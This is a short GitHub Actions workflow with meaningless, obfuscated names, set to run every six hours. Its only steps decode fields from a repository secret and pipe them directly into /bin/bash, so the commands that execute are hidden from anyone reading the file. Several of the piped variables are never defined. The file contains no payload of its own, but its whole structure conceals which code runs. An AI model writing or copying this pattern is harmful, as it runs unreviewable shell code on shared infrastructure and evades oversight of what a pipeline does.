name: skegundress

on:
  workflow_dispatch:
  schedule:
    - cron: '23 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: skegundress
        env:
          dgsa152: ${{ secrets.dgsa152 }}
        run: |
          echo $dgsa152 | jq -r .ckens4880 | /bin/bash
          echo $cn91 | jq -r .e99614 | /bin/bash
          echo $utqh40641 | jq -r .xh3429 | /bin/bash
          echo $me3001 | jq -r .sskzx2 | /bin/bash

